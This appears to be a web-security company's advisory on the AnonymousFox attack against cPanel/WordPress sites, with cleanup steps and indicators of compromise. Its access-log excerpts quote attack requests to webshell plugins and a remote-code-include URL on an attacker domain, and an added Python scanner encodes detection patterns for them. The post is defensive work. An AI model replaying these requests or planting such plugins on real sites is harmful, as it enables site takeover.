AnonymousFox: how to clean & updates

New AnonymousFox attacks emerged this month, affecting cPanel-based sites.
Below is how the attack develops:

1. Using malicious scripts injected via WordPress, the .contactemail file is edited.
2. The cPanel password is changed, using a newly created email [email protected]
Alternatively, secondary email accounts are created, like [email protected]
3. WordPress users with administrator privileges are created.
Look for the “guest” username.
4. Malicious WordPress plugins are added, which are used to manage files.
Example: “/wp-content/plugins/llmrhps/data.php”

Need help? Let us clean your site.

What to do when dealing with an AnonymousFox hack?

Step 1
Ask your web host to perform a backup
  • Don’t panic.
  • Ask your web host to perform a backup, which will include database, emails and web files.
  • Download a backup copy on your local computer, to secure the latest working site version.
Step 2
Disable all your sites
  • Disable all active sites.
  • If your tech knowledge is limited, ask your web host to temporarily suspend your cPanel.
  • Check for newly created subdomains.
Step 3
Restore cPanel access.
  • Go to cPanel > Contact Information, change the primary and secondary email addresses and restore the Pushbullet token.
  • Remove all FTP accounts under FTP Accounts.
  • Remove all suspicious email accounts under Email Accounts.
Step 4
Perform a thorough malware cleanup.

Notes:

cPanelLauren – “The anonymousfox vulnerability, caused by running vulnerable scripts on a cPanel account does not allow for root access.
Allowing vulnerable content on the server which in turn allows a way for an attacker to obtain access to the cPanel password reset does not constitute a bug.
What ultimately should be done here is remove the vulnerable content.”

Anonymous Fox has an official website, where members describe the current tools used for the attacks.
https://anonymousfox.co/

Need help? Try our Free security analysis.

Part 1: https://www.youtube.com/watch?v=IWsi1BGKqXA
Part 2: https://www.youtube.com/watch?v=5wcNvqhj7_E
Part 3: https://www.youtube.com/watch?v=ZvJp86xpcFU

Malicious URLs:
http://anonymousfox.io/v4/v4.txt
https://t.me/Anonymous_Fox/9

Malicious requests:
162.158.93.172 - - [02/Apr/2021:07:01:10 +1100] "POST /wp-content/plugins/erwvxqtoto/alwso.php HTTP/1.1" 200
162.158.118.213 - - [02/Apr/2021:01:16:58 +1100] "GET /wp-content/plugins/erwvxqtoto/alwso.php HTTP/1.1" 200 3703 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0"
[06/Mar/2021:06:16:50 +1100] "GET /wp-admin/plugins.php?action=deactivate&plugin=wordfence/wordfence.php&plugin_status=all&paged=1&s&_wpnonce=ffdf55bc02 HTTP/1.1" 403 1167 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
[06/Mar/2021:06:16:58 +1100] "POST /wp-admin/update.php?action=upload-plugin HTTP/1.1" 200
[06/Mar/2021:06:17:05 +1100] "GET /wp-content/plugins/llmrhps/data.php HTTP/1.1" 200
[06/Mar/2021:23:27:12 +1100] "GET /wp-content/plugins/llmrhps/data.php HTTP/2" 200
[06/Mar/2021:23:27:15 +1100] "GET /wp-content/plugins/llmrhps/hsxltviago.php?php=http://anonymousfox.io/v4/v4.txt HTTP/1.1" 200 100 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
[06/Mar/2021:23:27:18 +1100] "POST /wp-content/plugins/llmrhps/hsxltviago.php?php=http://anonymousfox.io/v4/v4.txt HTTP/1.1" 200 157 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
[29/Mar/2021:02:26:41 +1100] "GET /wp-content/plugins/erwvxqtoto/wso.php HTTP/1.1" 200 3570 "https://example.com/wp-content/plugins/erwvxqtoto/up.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36"
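As an added example (not code from the post), here is a small Python script that parses combined-format access-log lines and flags the indicators from the attack chain and the request excerpt above: unknown plugin directories, the ?php=http:// remote-include parameter, Wordfence deactivation, plugin-upload POSTs and the misspelt user-agent string. The sample lines and the KNOWN_PLUGINS allow-list are constructed assumptions.

```python
import re

# Constructed sample access-log lines adapted from the post's excerpt (paths and UA strings are the post's; IPs/timestamps are sample values).
SAMPLE_LOG = """\
162.158.93.172 - - [02/Apr/2021:07:01:10 +1100] "POST /wp-content/plugins/erwvxqtoto/alwso.php HTTP/1.1" 200 12 "-" "Mozilla/5.0"
10.0.0.5 - - [06/Mar/2021:06:16:50 +1100] "GET /wp-admin/plugins.php?action=deactivate&plugin=wordfence/wordfence.php HTTP/1.1" 403 1167 "-" "Mozlila/5.0 (Linux; Android 7.0) Moblie Safari/537.36"
10.0.0.5 - - [06/Mar/2021:06:16:58 +1100] "POST /wp-admin/update.php?action=upload-plugin HTTP/1.1" 200 50 "-" "Mozlila/5.0"
10.0.0.5 - - [06/Mar/2021:23:27:15 +1100] "GET /wp-content/plugins/llmrhps/hsxltviago.php?php=http://anonymousfox.io/v4/v4.txt HTTP/1.1" 200 100 "-" "Mozlila/5.0"
192.0.2.9 - - [07/Mar/2021:10:00:00 +1100] "GET /wp-content/plugins/wordfence/css/main.css HTTP/1.1" 200 800 "-" "Mozilla/5.0"
"""

# Combined log format: client ident user [time] "method path proto" status size "referer" "user-agent"
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "[^"]*" "([^"]*)"')

# Plugin directories legitimately installed on the site (assumed list; fill it from the real wp-content/plugins).
KNOWN_PLUGINS = {"wordfence", "akismet"}


def parse_line(line):
    """Parse one combined-format line into a dict, or return None if it does not match."""
    if not (m := LOG_RE.match(line)):
        return None
    ip, ts, method, path, status, ua = m.groups()
    return {"ip": ip, "time": ts, "method": method, "path": path, "status": int(status), "ua": ua}


def indicators(entry):
    """Return the names of the AnonymousFox-style indicators one parsed entry triggers."""
    path, ua, hits = entry["path"], entry["ua"], []
    plugin = re.match(r"/wp-content/plugins/([^/]+)/", path)
    if plugin and plugin.group(1) not in KNOWN_PLUGINS:
        hits.append("unknown-plugin-dir")            # random names such as llmrhps, erwvxqtoto
    if re.search(r"[?&]php=https?://", path):
        hits.append("remote-include-param")          # ?php=http://.../v4/v4.txt
    if "action=deactivate" in path and "wordfence" in path:
        hits.append("security-plugin-deactivation")  # security plugin being switched off
    if entry["method"] == "POST" and "action=upload-plugin" in path:
        hits.append("plugin-upload")                 # the file-manager plugin being dropped in
    if "Mozlila/" in ua or "Moblie " in ua or "Bulid/" in ua:
        hits.append("typo-user-agent")               # misspelt UA string seen in the post
    return hits


def scan(log_text):
    """Return (ip, path, indicators) for every line that triggers at least one indicator."""
    flagged = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry and (hits := indicators(entry)):
            flagged.append((entry["ip"], entry["path"], hits))
    return flagged
```

Run it over the real log with scan(open(path).read()); if the site sits behind a CDN or reverse proxy, the first column is the proxy address rather than the client's, so check the forwarded-client field if the log format carries one.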